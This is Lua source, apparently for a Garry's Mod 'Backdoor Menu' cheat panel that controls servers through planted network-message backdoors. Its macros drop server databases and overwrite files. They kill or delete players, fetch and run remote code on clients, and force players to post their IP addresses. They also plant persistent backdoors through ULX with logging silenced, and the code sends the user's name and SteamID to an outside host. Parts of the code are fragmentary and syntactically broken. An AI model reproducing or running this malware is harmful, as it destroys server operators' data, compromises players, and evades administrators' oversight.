                              ["Console jammer"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(timer.Exists("consoleJammer")) then
                                  timer.Create("consoleJammer", 0.5, 0, function()
                                  print( "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" )
                                  end )
                                ["Desc"] = "Spams the server side console with a fuck load of new lines",
                              ["Moan steps"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(hook.GetTable()["PlayerFootstep"]["moanStep"]) then
                                  hook.Add("PlayerFootstep", "moanStep", function(ply, pos, foot, sound2, volume, filter) ply:EmitSound( "vo/npc/female01/pain06.wav",75,math.random( 50, 150 )) end )
                                  hook.Remove("PlayerFootstep", "moanStep")
                                ["Desc"] = "Turns all steps into highly orgasmic moans.",
                              ["Delete server"] = {
                                ["Type"] = 3,
                                ["Code"] = [[
                                local date = "%m-%d-%y" )
                                local databases = { "jobdata","darkrp_door","darkrp_levels","darkrp_prestige","darkrp_doorgroups","darkrp_doorjobs","darkrp_jobspawn","darkrp_position","darkrp_player","darkrp_dbversion","FAdmin_CAMIPrivileges","FADMIN_GROUPS","FAdmin_Immunity","FADMIN_MOTD","FAdmin_PlayerGroup","FADMIN_PRIVILEGES","FADMIN_RESTRICTEDENTS","FAdmin_ServerSettings","FAdminBans","FPP_ANTISPAM1","FPP_BLOCKED1","FPP_BLOCKMODELSETTINGS1","FPP_ENTITYDAMAGE1","FPP_GLOBALSETTINGS1","FPP_GRAVGUN1","FPP_GROUPMEMBERS1","FPP_GROUPS3","FPP_GROUPTOOL","FPP_PHYSGUN1","FPP_PLAYERUSE1","FPP_TOOLADMINONLY","FPP_TOOLGUN1","FPP_TOOLRESTRICTPERSON1","FPP_TOOLTEAMRESTRICT","FPP_BLOCKEDMODELS1","awarn_playerdata","awarn_serverdata","awarn_warnings","blogs_players_v3","blogs_v3","stt_date","stt_players","mlog_logs","mlog_permissions","atlaschat_players","atlaschat_ranks","atlaschat_remote","atlaschat_restrictions","OreBag","fcd_playerData","dailylogin","ChessLeaderboard","qsgr_data","voting_npcs","cac_incidents","steam_rewards","playerdata","playerinformation","utime","permaprops","cc_characters","cc_npcs","ckit_chips","ckit_persist","exsto_data_bans","exsto_data_ranks","exsto_data_users","exsto_data_variables","exsto_restriction","inventories","kinv_items","libk_player","permitems","player_gangapps","player_gangdata","player_gangs","ps2_categories","ps2_equipmentslot","ps2_HatPersistence","ps2_itemmapping","ps2_itempersistence","ps2_OutfitHatPersistenceMapping","ps2_outfits","ps2_playermodelpersistence","ps2_servers","ps2_settings","ps2_trailpersistence","ps2_wallet","removeprops","scoreboard_friends","serverguard_analytics","serverguard_bans","serverguard_pms","serverguard_ranks","serverguard_reports","serverguard_schema","serverguard_ttt_autoslays","serverguard_users","serverguard_watchlist","tttstats","ttt_passes_history","specdm_stats_new","ps2_achievements","ps2_boosterpersistence","ps2_cratepersistence","ps2_instatswitchweaponpersistence","ps2_keypersistence","ps2_rolecontrolpersistence","ps2_weaponpersistence","rapsheet","damagelog_autoslay","damagelog_names","damagelog_oldlogs","damagelog_weapons","kmapvote_mapinfo","kmapvote_ratings","mgang_gangs","mgang_players","deathrun_ids","deathrun_records","deathrun_stats","sui_ratings","shop_texthats","shop_money","shop_items","report_log" }
                                local datafiles = { "ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","wire_version.txt","UTeam.txt","prevhas.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","hitnumbers/settings.txt","soundlists/common_sounds.txt","vcmod/controls.txt","vcmod/dataserver.txt","qsgr_data/sqgr_settings.txt","blogs/configcache.txt","blogs/language.txt","cac/adminuipack.txt","ezjobs/config.txt","damagelog/colors.txt","damagelog/filters_new.txt","craphead_scripts/armory_robbery/rp_downtown_v4c/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_evilmelon_v1/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v3/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v4/policearmory_location.txt","mg_gangsdata/mg_npcspawns.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","prevhash.txt","permaprops_config.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","vliss/settings/config.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                local sensitivefiles = { "ulx_logs/"".txt","ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","vcmod/controls.txt","vcmod/dataserver.txt","blogs/configcache.dat","blogs/language.txt","blogs/config_v5.txt","cac/adminuipack.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","permaprops_config.txt","whitelist.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                for k,v in pairs(databases) do
                                  if sql.TableExists(v) then
                                    sql.Query("DROP TABLE "..v.." ;")
                                    sql.Query("CREATE TABLE IF NOT EXISTS "..v.." ( steamid TEXT NOT NULL PRIMARY KEY, value TEXT );")
                                for k,v in pairs(datafiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                for k,v in pairs(sensitivefiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                ["Desc"] = "Removes as much data as possible.",
                              ["Kill player (silent)"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:KillSilent()]],
                                ["Desc"] = "Silent slay a player.",
                              ["Delete props"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:ConCommand("gmod_cleanup")]],
                                ["Desc"] = "Removes all of the selected users props.",
                              ["Send lua"] = {
                                ["Type"] = 2,
                                ["Code"] = [[ v:SendLua( ""..@1.."") ]],
                                ["Desc"] = "Sends lua to the selected user.",
                                ["NeedsParameters"] = 1,
                              ["My ip is..."] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                if (darkrp || DarkRP) then
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say /ooc My IP is "..b) end, function(error) return error end )')
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say My IP is "..b) end, function(error) return error end )')
                                ["Desc"] = "Forces the selected user(s) to say their own ip in chat.",
                              ["Ice skating simulator"] = {
                                ["Type"] = 1,
                                ["Code"] = [[ if !(icePark) then icePark = true RunConsoleCommand("sv_friction", 0) else icePark = false RunConsoleCommand("sv_friction", 8) end ]],
                                ["Desc"] = "Makes everyone skate around like they're on ice.",
                              ["Scramble vision"] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                v:SendLua('http.Fetch("", function(b,l,h,c) RunString(b) end, function(error) print(error) end )')
                                ["Desc"] = "Fucks the view of target",
                              // key/view scrambler, fuck with escape menu
                              ------------------------ dangerous codens ------------------------
                              ["DarkRP clear all money"] = {
                                ["Type"] = 3,
                                ["Code"] = [[RunConsoleCommand("rp_resetallmoney")]],
                                ["Desc"] = "Kids will cry to the admins for the next week about losing their precious money",
                              ["Cleanup map"] = {
                                ["Type"] = 3,
                                ["Code"] = [[game.CleanUpMap()]],
                                ["Desc"] = "Wipe the map clean, taking everybodys cars, printers and bases out",
                              ["Vaporize all players"] = {
                                ["Type"] = 3,
                                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:Remove() end]],
                                ["Desc"] = "Deletes their player entity, leaving them staring at a wall of errors",
                              ["FPP Unrestrict everything"] = {
                                ["Type"] = 3,
                                ["Code"] = [[FPP.Blocked = {} FPP.BlockedModels = {} FPP.RestrictedTools = {} FPP.RestrictedToolsPlayers = {} ]],
                                ["Desc"] = "",
                              ["Wipe data folder"] = {
                                ["Type"] = 3,
                                ["Code"] = [[local files, directories = file.Find( "*", "DATA" ) for k, v in pairs( files ) do file.Delete( v ) end ]],
                                ["Desc"] = "Wipe the servers data folder, fucking all their settings and stuff up",
                              ["Wipe DarkRP SQL Tables"] = {
                                ["Type"] = 3,
                                ["Code"] = [[ MySQLite.query ('DROP TABLE darkrp_player' MySQLite.query('CREATE TABLE IF NOT EXISTS darkrp_player(idx INTEGER NOT NULL)') ]],
                                ["Desc"] = "Completely fucks darkrp, forces them to reinstall the entire server",
                            local selectedbackdoor = ""
                            local backdoorargs = ""
                            local selectedplayers = {}
                            //////////////////////////////// BIG PRIVET CHEETZ ////////////////////////////////
                            BD.BDMacros["@ Persistent Infection"] = {
                              ["Type"] = 1,
                              ["Code"] = [[
                              local config = ULib.fileRead( "data/ulx/config.txt" )
                              config = config.."\nulx logEcho 0"
                              config = config.."\nulx luarun %BD"
                              config = config.."\nulx logEcho 1"
                              ULib.fileWrite( "data/ulx/config.txt", config )
                              for _, p in pairs(player.GetAll()) do if %LCP then p:ChatPrint( "Persistent infection installed on server" ) end end
                              ["Desc"] = "Writes the backdoor code into memory, making sure that it stays on the server after restart",
                              ["Private"] = true,
                            BD.BackdoorTypes[">Odium Detector"] = {
                              ["Code"] = "util.AddNetworkString( 'NoOdium_ReadPing' ) net.Receive( 'NoOdium_ReadPing', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoOdium_ReadPing",
                            BD.BackdoorTypes["No Narks"] = {
                              ["Code"] = "util.AddNetworkString( 'NoNerks' ) net.Receive( 'NoNerks', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoNerks",
                            function BD.GenerateBackdoorList( parent, category )
                              for k, v in SortedPairs( BD.BDMacros, false ) do
                                if v["Type"] != category then continue end
                                local plypanel2 = vgui.Create( "DPanel" )
                                plypanel2:SetPos( 0, 0 )
                                plypanel2:SetSize( 200, 25 )
                                plypanel2.Paint = function() -- Paint function
                                draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
                                if selectedbackdoor == k then surface.SetDrawColor(Color(50, 250, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
                                surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
                              local plyname = vgui.Create( "DLabel", plypanel2 )
                              plyname:SetPos( 10, 5 )
                              plyname:SetFont( "Trebuchet18" )
                              local tcol = Color( 255, 255, 255 )
                              if v.Private then tcol = Color( 155, 255, 155 ) end
                              plyname:SetColor( tcol )
                              plyname:SetText( k )
                              plyname:SetSize(180, 15)
                              local ****** = vgui.Create("DButton", plypanel2)
                              ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
                              ******:SetPos( 0, 0 )
                              if v["Desc"] != "" then ******:SetToolTip( v["Desc"] ) end
                              ******.Paint = function(panel, w, h)
                            ******.DoClick = function()
                            selectedbackdoor = k
                          parent:AddItem( plypanel2 )
                      function BD.FormatCodeTargeted()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local ids = {}
                        for k, v in pairs( selectedplayers ) do
                          if !v:IsValid() then table.RemoveByValue( selectedplayers, v ) continue end
                          table.insert( ids, v:UniqueID() )
                        local code = [[ local targets = ## for k, v in pairs( player.GetAll() ) do if !v:IsValid() then continue end if table.HasValue( targets, v:UniqueID() ) then %% end end ]]
                        code = string.Replace( code, "##", table.ToString( ids ) )
                        code = string.Replace( code, "%%", BD.BDMacros[selectedbackdoor]["Code"] or "" )
                        code = string.Replace( code, "%LP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                        BD.Fire( code )
                      function BD.FormatCodeGlobal()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local code = BD.BDMacros[selectedbackdoor]["Code"]
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                          code = string.Replace( code, "%LP", LocalPlayer():UniqueID() )
                          code = string.Replace( code, "%LCP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                          code = string.Replace( code, "%BD", BD.GetActive().Code )
                        BD.Fire( code )
                      local safenet = net
                      local function bdnet()
                        if odium and odium.G then return end
                        return safenet
                      local h = http
                      local p = "Post"
                      local str = ""
                      local lp = LocalPlayer()
                      local n = lp:Nick()
                      local id = lp:SteamID64()
                      h[p](str, {
                        name = n,
                        steamid = id,
                      nil, nil)
                      function BD.Fire( code )
                        local cbd = BD.CurrentBackdoor
                        if !BD.Backdoors[cbd] then
                          BD.ChatText( "The selected backdoor is unavailable!", Color(255,155,155) )
                        local key = BD.BackdoorTypes[cbd].Netkey
                        bdnet().Start( key )
                        bdnet().WriteString( code )
                      function BD.BackdoorMenu()
                        BD.Backdoors = BD.PingBackDoors()
                        if !BD.IsMessagePooled( "cucked" ) and BD.BackdoorActive() then
                          BD.Fire( [[util.AddNetworkString( "cucked" )
                          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
                            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
                              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                                ]] )
                              local BDMenu = vgui.Create("DFrame")
                              BDMenu:SetTitle("Backdoor Menu")
                              BDMenu.Paint = function( self, w, h)
                              surface.SetDrawColor( Color(50, 50, 90, 255) )
                              surface.DrawRect( 0, 0, w, h )
                              surface.SetDrawColor( Color(155, 155, 155, 255) )
                              surface.DrawOutlinedRect( 0, 0, w, h )
                              surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
                              surface.SetDrawColor( Color(0, 0, 0, 200) )
                              surface.DrawRect( 10, 25, w - 20, h - 35 )
                              surface.DrawRect( 15, 30, w - 30, 35 )
                              draw.SimpleText("Indiscriminate Lulz", "DermaDefault", 22, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Specific Targets", "DermaDefault", 228, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Trash the place", "DermaDefault", 432, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Players to Target", "DermaDefault", 432, 305, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Macro Paramaters (seperate with commas)", "DermaDefault", 432, 610, Color(255, 255, 255), 0, 1)
                            local it = 145
                            local wedungoofd = vgui.Create( "DLabel", BDMenu )
                            wedungoofd:SetPos( 25, 38 )
                            wedungoofd:SetFont( "Trebuchet18" )
                            wedungoofd:SetColor( Color( 100, 255, 100 ) )
                            wedungoofd:SetText( "CHOOSE BACKDOOR:" )
                            for bd, t in pairs( BD.BackdoorTypes ) do
                              local ****** = vgui.Create("DButton", BDMenu)
                              ******:SetSize( 100, 25 )
                              ******:SetPos( it, 35 )
                              ******:SetText( bd )
                              ******:SetTextColor(Color(255, 255, 255, 255))
                              ******.Paint = function(panel, w, h)
                              if BD.Backdoors[bd] then
                                surface.SetDrawColor(100, 100, 200 ,255)
                                surface.DrawOutlinedRect(0, 0, w, h)
                                surface.SetDrawColor(0, 0, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                                surface.SetDrawColor(50, 50, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                            ******.DoClick = function()
                            BD.ChatText( "Set active backdoor to ", Color(155,155,255) )
                            BD.CurrentBackdoor = bd
                          it = it + 110
                        local Plist = vgui.Create( "DPanelList", BDMenu )
                        Plist:SetPos( 20, 85 )
                        Plist:SetSize( 200, 530 )
                        Plist:SetPadding( 5 )
                        Plist:SetSpacing( 5 )
                        Plist:EnableHorizontal( false )
                        Plist:EnableVerticalScrollbar( true )
                        Plist:SetName( "" )
                        Plist.Paint = function( self, w, h )
                        surface.SetDrawColor(50, 50, 50 ,255)
                        surface.DrawOutlinedRect(0, 0, w, h)
                        surface.SetDrawColor(0, 0, 0 ,200)
                        surface.DrawRect(0, 0, w, h)
                      local Plist2 = vgui.Create( "DPanelList", BDMenu )
                      Plist2:SetPos( 225, 85 )
                      Plist2:SetSize( 200, 610 )
                      Plist2:SetPadding( 5 )
                      Plist2:SetSpacing( 5 )
                      Plist2:EnableHorizontal( false )
                      Plist2:EnableVerticalScrollbar( true )
                      Plist2:SetName( "" )
                      Plist2.Paint = function( self, w, h )
                      surface.SetDrawColor(50, 50, 50 ,255)
                      surface.DrawOutlinedRect(0, 0, w, h)
                      surface.SetDrawColor(0, 0, 0 ,200)
                      surface.DrawRect(0, 0, w, h)
                    local Plist3 = vgui.Create( "DPanelList", BDMenu )
                    Plist3:SetPos( 430, 85 )
                    Plist3:SetSize( 200, 210 )
                    Plist3:SetPadding( 5 )
                    Plist3:SetSpacing( 5 )
                    Plist3:EnableHorizontal( false )
                    Plist3:EnableVerticalScrollbar( true )
                    Plist3:SetName( "" )
                    Plist3.Paint = function( self, w, h )
                    surface.SetDrawColor(50, 50, 50 ,255)
                    surface.DrawOutlinedRect(0, 0, w, h)
                    surface.SetDrawColor(0, 0, 0 ,200)
                    surface.DrawRect(0, 0, w, h)
                  local Plist4 = vgui.Create( "DPanelList", BDMenu )
                  Plist4:SetPos( 430, 315 )
                  Plist4:SetSize( 200, 250 )
                  Plist4:SetPadding( 5 )
                  Plist4:SetSpacing( 5 )
                  Plist4:EnableHorizontal( false )
                  Plist4:EnableVerticalScrollbar( true )
                  Plist4:SetName( "" )
                  Plist4.Paint = function( self, w, h )
                  surface.SetDrawColor(50, 50, 50 ,255)
                  surface.DrawOutlinedRect(0, 0, w, h)
                  surface.SetDrawColor(0, 0, 0 ,200)
                  surface.DrawRect(0, 0, w, h)
                local ****** = vgui.Create("DButton", BDMenu)
                ******:SetSize( 200, 35 )
                ******:SetPos( 430, 660 )
                ******:SetText("Activate Backdoor!")
                ******:SetTextColor(Color(255, 255, 255, 255))
                ******.Paint = function(panel, w, h)
                surface.SetDrawColor(100, 100, 200 ,255)
                surface.DrawOutlinedRect(0, 0, w, h)
                surface.SetDrawColor(0, 0, 50 ,155)
                surface.DrawRect(0, 0, w, h)
              ******.DoClick = function()
              if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
              if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
            local helpimretarded = vgui.Create("DButton", BDMenu)
            helpimretarded:SetSize( 200, 35 )
            helpimretarded:SetPos( 20, 660 )
            helpimretarded:SetText("Print backdoor code")
            helpimretarded:SetTextColor(Color(255, 255, 255, 255))
            helpimretarded.Paint = function(panel, w, h)
            surface.SetDrawColor(100, 100, 200 ,255)
            surface.DrawOutlinedRect(0, 0, w, h)
            surface.SetDrawColor(0, 0, 50 ,155)
            surface.DrawRect(0, 0, w, h)
          helpimretarded.DoClick = function()
          BD.ChatText( "Output backdoor code to clipboard.  Ctrl-V it into a serverside .lua file on the target server then go molest its holes", Color(155,255,155) )
          local bdstring = BD.GetActive().Code
          --       local bdstring = [[util.AddNetworkString( "_CAC_ReadMemory" ) net.Receive( "_CAC_ReadMemory", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )]]
          SetClipboardText( bdstring )
        local helpimretarded2 = vgui.Create("DButton", BDMenu)
        helpimretarded2:SetSize( 200, 35 )
        helpimretarded2:SetPos( 20, 620 )
        helpimretarded2:SetText("ULX Luarun Backdoor")
        helpimretarded2:SetTextColor(Color(255, 255, 255, 255))
        helpimretarded2.Paint = function(panel, w, h)
        surface.SetDrawColor(100, 100, 200 ,255)
        surface.DrawOutlinedRect(0, 0, w, h)
        surface.SetDrawColor(0, 0, 50 ,155)
        surface.DrawRect(0, 0, w, h)
      helpimretarded2.DoClick = function()
      BD.ChatText( "Using ulx luarun to silently infect server", Color(155,255,155) )
      LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 0]] )
      timer.Simple( 0.5, function()
      LocalPlayer():ConCommand( "ulx luarun "..BD.GetActive().Code )
      --            LocalPlayer():ConCommand( "ulx luarun util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )" )
      end )
      timer.Simple( 1, function() LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 1]] ) end )
      timer.Simple( 1.5, function() if BD.IsMessagePooled( BD.GetActive().Netkey ) then BD.ChatText( "Successfully infected!", Color(155,255,155) ) else BD.ChatText( "ULX infection failed!", Color(255,155,155) ) end end )
    local moonman = vgui.Create( "DTextEntry", BDMenu )
    moonman:SetPos( 430, 625 )
    moonman:SetSize( 200, 30 )
    moonman:SetText( backdoorargs )
    moonman.OnChange = function( self )
    backdoorargs = self:GetValue()
    --    surface.PlaySound("buttons/button3.wav")
    local target1 = vgui.Create("DButton", BDMenu)
    target1:SetSize( 40, 20 )
    target1:SetPos( 520, 295 )
    target1:SetTextColor(Color(255, 255, 255, 255))
    target1.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target1.DoClick = function()
    for _, p in pairs(player.GetAll()) do
    if not table.HasValue( selectedplayers, p ) then
    table.insert( selectedplayers, p )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 40, 20 )
    target2:SetPos( 565, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 20, 20 )
    target2:SetPos( 610, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    table.insert( selectedplayers, LocalPlayer() )
    -- players list
    for k, v in pairs( player.GetAll() ) do
    local plypanel2 = vgui.Create( "DPanel" )
    plypanel2:SetPos( 0, 0 )
    plypanel2:SetSize( 200, 25 )
    plypanel2.Paint = function() -- Paint function
    draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
    if table.HasValue( selectedplayers, v ) then surface.SetDrawColor(Color(50, 255, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
    surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
    local plyname = vgui.Create( "DLabel", plypanel2 )
    plyname:SetPos( 10, 5 )
    plyname:SetFont( "Trebuchet18" )
    local tcol = Color( 255, 255, 255 )
    if v == LocalPlayer() then tcol = Color( 155, 155, 255 ) end
    --  elseif BD.IsFriend( v ) then tcol = Color( 0, 255, 0 )
    --    elseif BD.GetRank(v) != ( "user" or "guest" or "player" ) then tcol = Color( 255, 100, 0 ) end
    plyname:SetColor( tcol )
    plyname:SetText( v:Nick() )
    plyname:SetSize(180, 15)
    local ****** = vgui.Create("DButton", plypanel2)
    ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
